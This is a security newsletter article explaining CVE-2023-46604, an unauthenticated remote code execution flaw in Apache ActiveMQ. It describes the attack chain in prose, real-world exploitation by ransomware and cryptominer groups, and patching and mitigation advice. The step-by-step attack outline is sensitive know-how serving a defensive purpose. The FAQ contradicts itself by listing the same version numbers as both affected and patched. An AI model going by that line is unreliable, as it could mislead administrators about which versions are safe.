CVE-2023-46604 Explained: Apache ActiveMQ Remote Code Execution (CVSS 10.0)
A CVSS 10.0 unauthenticated remote code execution vulnerability in Apache ActiveMQ's OpenWire protocol that allows arbitrary Java class loading from a remote server. Weaponised within days by ransomware groups, cryptominers, and nation-state actors.
CVE-2023-46604 is a CVSS 10.0 remote code execution vulnerability in Apache ActiveMQ, the widely deployed open-source message broker. The vulnerability exists in the OpenWire protocol — ActiveMQ's native binary wire protocol used on the default port 61616. An unauthenticated attacker sends a crafted ClassInfo ExceptionResponse message, causing the ActiveMQ broker to make an outbound HTTP request to an attacker-specified URL and load the returned Java class, executing arbitrary code with the broker process's privileges.
Apache disclosed the vulnerability on October 25, 2023. Exploitation by ransomware operators and cryptominers was confirmed within days. The attack requires only network access to port 61616 and delivers code execution with no authentication and no user interaction — a combination that earned it the maximum CVSS score.
How CVE-2023-46604 Works: OpenWire ClassInfo to Remote Code Execution
Apache ActiveMQ's OpenWire protocol handles binary messages that carry typed Java object payloads. The ClassInfo command type instructs the broker to load and register a class definition — a legitimate feature used for remote class loading in distributed Java environments.
The vulnerability is in how ActiveMQ processes the ClassPathEntry in the ClassInfo command. It constructs an HTTP URL from the attacker-supplied path and performs a remote class load using Java's URL class loader, without validating that the URL points to a trusted or expected source. The loaded class's static initialiser and constructor are executed immediately during class loading, achieving code execution as the ActiveMQ broker process user.
Because the OpenWire port is the broker's primary protocol endpoint — intended to be accessible to all message producers and consumers — it is frequently internet-accessible. This makes the attack remotely exploitable across the public internet with a single crafted binary message.
Identify ActiveMQ brokers with port 61616 accessible
Scan for TCP port 61616. ActiveMQ's banner identifies the service and version during OpenWire handshake. Shodan and Censys index tens of thousands of exposed ActiveMQ instances.
Send crafted ClassInfo ExceptionResponse packet
Send a single crafted OpenWire binary message containing a ClassPathEntry pointing to an attacker-controlled HTTP server URL. No authentication handshake or session establishment is required.
Broker performs remote class load
ActiveMQ fetches the attacker's URL via HTTP and loads the returned Java class using the URL class loader. The class is loaded in the context of the broker JVM process.
Malicious class executes on broker
Static initialisers and constructor code in the attacker's Java class execute immediately during class loading — before any validation. The code runs as the ActiveMQ service user, which is often root or a privileged service account.
Deploy ransomware, cryptominer, or backdoor
HelloKitty ransomware operators used initial access to deploy encryptors. Kinsing deployed cryptocurrency mining payloads. Other actors established persistent shells for later-stage operations.
Exploitation in the Wild: Ransomware and Cryptomining
CVE-2023-46604 was weaponised remarkably quickly. Within 72 hours of the advisory, Rapid7 observed active exploitation attempts. SentinelOne attributed confirmed intrusions using CVE-2023-46604 as initial access to HelloKitty — the ransomware group responsible for the CD Projekt Red breach — deploying both Windows and Linux ransomware variants depending on the target OS.
Kinsing, a prolific cryptomining threat actor known for targeting containerised Linux environments, also deployed cryptominer payloads via CVE-2023-46604. Nation-state actors were also observed in the exploitation wave, reflecting the attractiveness of message broker compromise for persistent internal network access.
ActiveMQ brokers are particularly high-value targets because they typically sit on network segments with broad connectivity — they must communicate with all applications that produce and consume messages, often spanning multiple tiers of the application stack. A compromised broker is a pivot point into the internal network, not just a single system compromise.
“Threat actors are actively exploiting a recently disclosed critical security flaw in Apache ActiveMQ to distribute HelloKitty ransomware on susceptible Windows systems.”
— SentinelOne Threat Intelligence, November 2023
Patching and Mitigating CVE-2023-46604
The fix is a version upgrade. The interim mitigation is firewall restriction of the OpenWire port.
Upgrade Apache ActiveMQ immediately
Patch to the fixed version for your branch: 5.15.16+, 5.16.7+, 5.17.6+, or 5.18.3+. Verify by checking the ActiveMQ version in the web console (http://broker:8161/admin) or via the CLI with activemq --version.
Restrict access to port 61616 at the network level
Allow only application servers that legitimately produce or consume messages to reach port 61616. Block all other access at the firewall. This eliminates remote exploitation even on unpatched versions by removing the attack surface from untrusted networks.
Restrict port 8161 (web console) to trusted networks
The ActiveMQ web administration console on port 8161 provides additional configuration and management capabilities. It should never be internet-accessible. Apply the same network-level restriction as for port 61616.
Investigate systems that ran unpatched, internet-exposed ActiveMQ
Any internet-exposed ActiveMQ instance running a vulnerable version before patching should be treated as potentially compromised. Look for new cron jobs, modified startup scripts, unexpected outbound connections, and new process trees spawned from the ActiveMQ JVM process.
The bottom line
CVE-2023-46604 is the consequence of exposing a binary protocol with unsafe remote class loading to an untrusted network. Apache ActiveMQ's OpenWire port was designed for application-to-broker communication in trusted internal environments. When organisations expose it to the internet — even accidentally — a CVSS 10.0 attack surface results.
The exploitation timeline is instructive: from advisory to confirmed ransomware deployment, less than one week. Security teams with vulnerable internet-exposed ActiveMQ instances had a very short window to patch before active attacks began. If you run ActiveMQ and did not patch within that window, investigation is the correct first step — not just patching. The patched broker on a previously compromised host still has whatever the attacker installed during their access window.
Frequently asked questions
What is CVE-2023-46604?
CVE-2023-46604 is a CVSS 10.0 vulnerability in Apache ActiveMQ. The OpenWire protocol handler deserialises a specially crafted ClassInfo message and performs a remote class load from an attacker-controlled URL — executing arbitrary Java code on the broker host without any authentication. Port 61616 (the default OpenWire port) is the attack surface.
Which versions of Apache ActiveMQ are affected?
Apache ActiveMQ 5.15.16 and earlier, 5.16.7 and earlier, 5.17.6 and earlier, and 5.18.3 and earlier are affected. Patched versions: 5.15.16, 5.16.7, 5.17.6, and 5.18.3 (all with the CVE-2023-46604 fix). Apache ActiveMQ Legacy OpenWire Module is also affected.
Was CVE-2023-46604 exploited in the wild?
Yes, rapidly. Rapid7 observed exploitation attempts within days of the advisory. SentinelOne confirmed HelloKitty ransomware operators used CVE-2023-46604 for initial access. Kinsing — a cryptomining threat actor — also weaponised the vulnerability. CISA added it to the Known Exploited Vulnerabilities catalog in November 2023.
Why is Apache ActiveMQ exposed on port 61616?
Port 61616 is the default OpenWire broker port and is often internet-accessible because ActiveMQ is deployed as a message bus between applications — sometimes requiring external connectivity. Many deployments leave the port open without network-level restrictions, making CVE-2023-46604 an attractive mass-exploitation target.
How do I fix CVE-2023-46604?
Upgrade Apache ActiveMQ to 5.15.16, 5.16.7, 5.17.6, or 5.18.3 depending on your version branch. If upgrading is not immediately possible, block inbound access to TCP port 61616 at the firewall for all untrusted networks. ActiveMQ's broker should only be accessible from application servers that legitimately need to communicate with it.
Sources & references
- NVD
- Apache ActiveMQ Security Advisory
- Rapid7 Attack Analysis: CVE-2023-46604
- SentinelOne — HelloKitty Ransomware Exploiting CVE-2023-46604
- CISA Known Exploited Vulnerabilities Catalog
Get threat intel before your inbox does.
50,000+ security professionals read Decryption Digest for early warnings on zero-days, ransomware, and nation-state campaigns. Free, weekly, no spam.
Unsubscribe anytime. We never sell your data.
Founder & Cybersecurity Evangelist, Decryption Digest
Cybersecurity professional with expertise in threat intelligence, vulnerability research, and enterprise security. Covers zero-days, ransomware, and nation-state operations for 50,000+ security professionals weekly.